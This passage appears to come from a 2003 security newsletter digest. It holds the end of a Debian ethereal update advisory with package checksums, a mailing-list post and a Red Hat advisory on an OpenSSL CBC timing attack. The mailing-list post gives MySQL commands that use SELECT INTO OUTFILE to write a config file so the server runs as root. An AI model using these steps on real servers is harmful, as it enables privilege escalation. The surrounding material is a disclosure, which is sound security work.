http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody3_arm.deb
Size/MD5 checksum: 1633066 5bdb9ee07245dd8c40d7fa67134bd8d4
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody3_arm.deb
Size/MD5 checksum: 296456 09e572c9ed3b6930c6b96fc92ab673bc
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody3_arm.deb
Size/MD5 checksum: 205294 7cfbeb0fe22d8b45a6357a51b06e8d5d
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody3_arm.deb
Size/MD5 checksum: 1437308 d6fa8aa979905914bfc58f44dbdb65f7
Intel IA-32 architecture:
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody3_i386.deb
Size/MD5 checksum: 1511698 82a59c219398c48e420cda7d2e715116
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody3_i386.deb
Size/MD5 checksum: 285768 b40e3cf0e9bbb222dc412b0d5b188c5c
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody3_i386.deb
Size/MD5 checksum: 197614 1e4c85a78880b6ed7fc97d446dd4898d
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody3_i386.deb
Size/MD5 checksum: 1324276 614f13d1070786bda57e1e9a30310288
Intel IA-64 architecture:
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody3_ia64.deb
Size/MD5 checksum: 2148490 f3d2d8f7690829c368c83c649befe4ce
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody3_ia64.deb
Size/MD5 checksum: 372514 d5afd45af2fb3a25b43fc7d76c9e273f
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody3_ia64.deb
Size/MD5 checksum: 233006 c0b62c056a2dcdb4d3577f630154e407
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody3_ia64.deb
Size/MD5 checksum: 1858696 1dd251efeacb7dbcc696577713d032fc
HP Precision architecture:
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody3_hppa.deb
Size/MD5 checksum: 1801870 c7b0d97f62f6f2b655a99ab9617b6029
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody3_hppa.deb
Size/MD5 checksum: 321584 8d111cf4ab4d2e0022530bc2a4b79d83
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody3_hppa.deb
Size/MD5 checksum: 216172 e0fb0c36375a74316fa935b9656f57d8
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody3_hppa.deb
Size/MD5 checksum: 1574556 81243f9603d19ccb433c942f7b090bc9
Motorola 680x0 architecture:
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody3_m68k.deb
Size/MD5 checksum: 1422180 4571e08fb347ac15c2b903a1d39332b8
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody3_m68k.deb
Size/MD5 checksum: 281916 f6003a2b853df6ea9d5c1670fb3488f7
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody3_m68k.deb
Size/MD5 checksum: 194458 173ca731703ef1c5b5967a8ed4f09196
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody3_m68k.deb
Size/MD5 checksum: 1246578 57c02c9f5239b78acfc28d9dc5aeb80c
Big endian MIPS architecture:
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody3_mips.deb
Size/MD5 checksum: 1615550 d9c958c9d84aa46330cb52b4627f9da4
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody3_mips.deb
Size/MD5 checksum: 304628 76542f451cec70e10f6718fc9cdfd473
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody3_mips.deb
Size/MD5 checksum: 212940 2e6a28d7f0e518c159d1715c1dabfb6e
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody3_mips.deb
Size/MD5 checksum: 1420632 2aa07e035f8b1e7b582fa570953b0187
Little endian MIPS architecture:
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody3_mipsel.deb
Size/MD5 checksum: 1595974 1bab5c206dd5e3aedac8b276c5e25b35
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody3_mipsel.deb
Size/MD5 checksum: 304148 826ac2fb288f72e59c47131ddbb73c37
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody3_mipsel.deb
Size/MD5 checksum: 212576 f774137fe23acd3d35ba5b30882dc23b
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody3_mipsel.deb
Size/MD5 checksum: 1404730 a86642e8e781bb7a8459e82837666f4e
PowerPC architecture:
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody3_powerpc.deb
Size/MD5 checksum: 1616326 48b48e54915a343ed9e32da489126a3c
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody3_powerpc.deb
Size/MD5 checksum: 301292 3258bcbfdcc23b16ed6d0473716826b0
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody3_powerpc.deb
Size/MD5 checksum: 208134 4371d4a090a36ba10e375afe993a0fab
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody3_powerpc.deb
Size/MD5 checksum: 1417204 86a2d16ee4ce4eaa0b23d8325f3463dd
IBM S/390 architecture:
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody3_s390.deb
Size/MD5 checksum: 1573012 37b11544056fd05d728ef2b0bdfdd5b3
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody3_s390.deb
Size/MD5 checksum: 300112 063cc53789cd592c1b990799c07f5f78
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody3_s390.deb
Size/MD5 checksum: 203152 43d6096bd53c59385bc6a33cc3b9c911
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody3_s390.deb
Size/MD5 checksum: 1385534 7d667a52da51088109fadaafed162f31
Sun Sparc architecture:
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody3_sparc.deb
Size/MD5 checksum: 1580312 a3be7ec2a179b01bd6fb24a22402e825
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody3_sparc.deb
Size/MD5 checksum: 317458 a7a786f477cd9d492b66e92b0bbca532
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody3_sparc.deb
Size/MD5 checksum: 203950 620a3ecbd4737a07e7c1f43f587a6c56
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody3_sparc.deb
Size/MD5 checksum: 1387146 cd414b1c49d31a4bbe7ea3a77890d476
These files will probably be moved into the stable distribution on
its next revision.
- ---------------------------------------------------------------------------------
End of Doc 3
===============================================================================
===============================================================================
4.)MySQL user can be changed to root
===============================================================================
Hi. I tried this on my own MySQL 3.23.55 !!!
I found out that logging as the root user, we can change mysqld to run as root instead that i.e. mysql but this works only if there's just one my.cnf file and it is locate in /etc...
Here's how I did it...
I logged in as root and than I did this:
mysql>CREATE DATABASE roottext;
mysql>USE roottext;
mysql>CREATE TABLE hack (conf VARCHAR(80));
mysql>INSERT IN hack VALUES ('[mysqld]');
mysql>INSERT IN hack VALUES ('user=root');
mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack
mysql>QUIT
Doing so we have create a my.cnf in mysql datadir containing:
[mysqld]
user=root
Now, when the mysql server will be restarted, the user option in our datadit my.cnf will override the one in /etc/my.cnf and mysql server will run as root, with all the security flwas that it takes...
This is very dangerous if we think that in mysql <= 3.23.53 it is really easy to get root access due to a bug (an exploit has been released publicly)...
I dunno how this problem can be solved, I'd like to hear from you something...
Thanks.... :)
by
Gufino
===============================================================================
End of Doc #4
===============================================================================
===============================================================================
5.)[RHSA-2003:062-11] Updated OpenSSL packages fix timing attack
===============================================================================
---------------------------------------------------------------------
Red Hat, Inc. Red Hat Security Advisory
Synopsis: Updated OpenSSL packages fix timing attack
Advisory ID: RHSA-2003:062-11
Issue date: 2003-02-19
Updated on: 2003-03-06
Product: Red Hat Linux
Keywords:
Cross references:
Obsoletes: RHSA-2002:160
CVE Names: CAN-2003-0078
---------------------------------------------------------------------
1. Topic:
Updated OpenSSL packages are available that fix a potential timing-based
attack.
2. Relevant releases/architectures:
Red Hat Linux 6.2 - i386
Red Hat Linux 7.0 - i386
Red Hat Linux 7.1 - i386
Red Hat Linux 7.2 - i386, i686, ia64
Red Hat Linux 7.3 - i386, i686
Red Hat Linux 8.0 - i386, i686
3. Problem description:
OpenSSL is a commercial-grade, full-featured, and open source toolkit that
implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer
Security (TLS v1) protocols as well as a full-strength general purpose
cryptography library.
In a paper, Brice Canvel, Alain Hiltgen, Serge Vaudenay, and Martin
Vuagnoux describe and demonstrate a timing-based attack on CBC ciphersuites
in SSL and TLS. An active attacker may be able to use timing observations
to distinguish between two different error cases: cipher padding errors and
MAC verification errors. Over multiple connections this can leak
sufficient information to make it possible to retrieve the plaintext of a
common, fixed block.
In order for an attack to be sucessful, an attacker must be able to act as
a man-in-the-middle to intercept and modify multiple connections, which all
involve a common fixed plaintext block (such as a password), and have good
network conditions that allow small changes in timing to be reliably
observed.
These erratum packages contain a patch provided by the OpenSSL group that
corrects this vulnerability.
Because server applications are affected by these vulnerabilities, we
advise users to restart all services that use OpenSSL functionality or
alternatively reboot their systems after installing these updates.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
To update all RPMs for your particular architecture, run:
rpm -Fvh [filenames]
where [filenames] is a list of the RPMs you wish to upgrade. Only those
RPMs which are currently installed will be updated. Those RPMs which are
not installed but included in the list will not be updated. Note that you
can also use wildcards (*.rpm) if your current directory *only* contains
the desired RPMs.
Please note that this update is also available via Red Hat Network. Many
people find this an easier way to apply updates. To use Red Hat Network,
launch the Red Hat Update Agent with the following command:
up2date
This will start an interactive process that will result in the appropriate
RPMs being upgraded on your system.
5. RPMs required:
Red Hat Linux 6.2:
SRPMS:
ftp://updates.redhat.com/6.2/en/os/SRPMS/openssl-0.9.5a-30.src.rpm
i386:
ftp://updates.redhat.com/6.2/en/os/i386/openssl-0.9.5a-30.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/openssl-devel-0.9.5a-30.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/openssl-perl-0.9.5a-30.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/openssl-python-0.9.5a-30.i386.rpm
Red Hat Linux 7.0:
SRPMS:
ftp://updates.redhat.com/7.0/en/os/SRPMS/openssl095a-0.9.5a-18.7.src.rpm
ftp://updates.redhat.com/7.0/en/os/SRPMS/openssl-0.9.6-14.src.rpm
i386:
ftp://updates.redhat.com/7.0/en/os/i386/openssl095a-0.9.5a-18.7.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssl-0.9.6-14.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssl-devel-0.9.6-14.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssl-perl-0.9.6-14.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssl-python-0.9.6-14.i386.rpm
Red Hat Linux 7.1:
SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/openssl095a-0.9.5a-18.7.src.rpm
ftp://updates.redhat.com/7.1/en/os/SRPMS/openssl-0.9.6-14.src.rpm
i386:
ftp://updates.redhat.com/7.1/en/os/i386/openssl095a-0.9.5a-18.7.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssl-0.9.6-14.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssl-devel-0.9.6-14.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssl-perl-0.9.6-14.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssl-python-0.9.6-14.i386.rpm
Red Hat Linux 7.2:
SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/openssl095a-0.9.5a-18.7.src.rpm
ftp://updates.redhat.com/7.2/en/os/SRPMS/openssl096-0.9.6-13.7.src.rpm
ftp://updates.redhat.com/7.2/en/os/SRPMS/openssl-0.9.6b-30.7.src.rpm
i386:
ftp://updates.redhat.com/7.2/en/os/i386/openssl095a-0.9.5a-18.7.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssl096-0.9.6-13.7.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssl-0.9.6b-30.7.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssl-devel-0.9.6b-30.7.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssl-perl-0.9.6b-30.7.i386.rpm
i686:
ftp://updates.redhat.com/7.2/en/os/i686/openssl-0.9.6b-30.7.i686.rpm
ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/openssl095a-0.9.5a-18.7.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssl096-0.9.6-13.7.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssl-0.9.6b-30.7.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssl-devel-0.9.6b-30.7.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssl-perl-0.9.6b-30.7.ia64.rpm
Red Hat Linux 7.3:
SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/openssl095a-0.9.5a-18.7.src.rpm
ftp://updates.redhat.com/7.3/en/os/SRPMS/openssl096-0.9.6-13.7.src.rpm
ftp://updates.redhat.com/7.3/en/os/SRPMS/openssl-0.9.6b-30.7.src.rpm
i386:
ftp://updates.redhat.com/7.3/en/os/i386/openssl095a-0.9.5a-18.7.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/openssl096-0.9.6-13.7.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/openssl-0.9.6b-30.7.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/openssl-devel-0.9.6b-30.7.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/openssl-perl-0.9.6b-30.7.i386.rpm
i686:
ftp://updates.redhat.com/7.3/en/os/i686/openssl-0.9.6b-30.7.i686.rpm
Red Hat Linux 8.0:
SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/openssl095a-0.9.5a-19.src.rpm
ftp://updates.redhat.com/8.0/en/os/SRPMS/openssl096-0.9.6-14.src.rpm
ftp://updates.redhat.com/8.0/en/os/SRPMS/openssl-0.9.6b-31.src.rpm
i386:
ftp://updates.redhat.com/8.0/en/os/i386/openssl095a-0.9.5a-19.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/openssl096-0.9.6-14.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/openssl-0.9.6b-31.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/openssl-devel-0.9.6b-31.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/openssl-perl-0.9.6b-31.i386.rpm
i686:
ftp://updates.redhat.com/8.0/en/os/i686/openssl-0.9.6b-31.i686.rpm
6. Verification:
These packages are GPG signed by Red Hat, Inc. for security. Our key
is available at http://www.redhat.com/about/contact/pgpkey.html
You can verify each package with the following command:
rpm --checksig -v <filename>
If you only wish to verify that each package has not been corrupted or
tampered with, examine only the md5sum with the following command:
md5sum <filename>
7. References:
http://lasecwww.epfl.ch/pub/lasec/doc/Vau02a.ps
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0078
8. Contact:
The Red Hat security contact is <secu-@redhat.com>. More contact
details at http://www.redhat.com/solutions/security/news/contact.html
Copyright 2003 Red Hat, Inc.
===============================================================================
End of Doc #5
===============================================================================
===============================================================================
End of GNSecNews #6
===============================================================================
|
|
 |
|
